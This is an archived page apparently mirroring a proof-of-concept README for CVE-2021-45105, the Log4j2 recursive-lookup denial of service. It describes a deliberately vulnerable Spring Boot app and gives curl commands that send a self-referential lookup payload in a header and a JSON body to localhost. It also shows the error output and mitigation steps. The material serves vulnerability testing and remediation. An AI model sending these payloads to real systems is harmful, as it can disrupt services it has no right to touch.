Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-45105 PoC — Apache Log4j2 does not always protect from infinite recursion in lookup evaluation

Source
https://github.com/dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1
Associated Vulnerability
Title:Apache Log4j2 does not always protect from infinite recursion in lookup evaluation (CVE-2021-45105)
Description:Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.
Readme
# Sample Log4j2 vulnerable application (CVE-2021-45105) 
# Versions Affected: all versions from 2.0-beta9 to 2.16.0

This application is based on Spring Boot web application vulnerable to CVE-2021-45105

It uses Log4j 2.16.0

![](./screenshot.png)

## Running the application

Run it:

```
Import the project in Java IDE as a maven project

Run CVEMainApplication.java as a spring boot app.

```

## Exploitation steps

* Then, trigger the exploit using:

```bash
For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${${::-${::-$${::-$}}}}"
}'
```


* Notice the output showing Infinite loop, however in testing did not find out that this DOS to be resource consuming as this infinite loop identified by program and error out:

```

 ${ctx:apiVersion} ${ctx:clientRef}2021-12-18 14:29:56,759 http-nio-8080-exec-1 ERROR An exception occurred processing Appender Console java.lang.IllegalStateException: Infinite loop in property interpolation of ::-${::-$${::-j}}: :
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
	
```

## Mitigation : 

Java 8 (or later) users should upgrade to release 2.17.0.

Alternatively, this can be mitigated in configuration:

In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC).
Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input.
File Snapshot

 [4.0K]  /data/pocs/3a3769e3e782ddcb8f998a2c7328770afdda541e
├── [1.3K]  pom.xml
├── [2.0K]  README.md
├── [ 31K]  screenshot.png
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  com
        │       └── [4.0K]  log4j
        │           └── [4.0K]  cve
        │               ├── [ 308]  CVEMainApplication.java
        │               ├── [ 221]  InputRequest.java
        │               └── [1013]  RestMainController.java
        └── [4.0K]  resources
            └── [ 430]  log4j2.xml

7 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →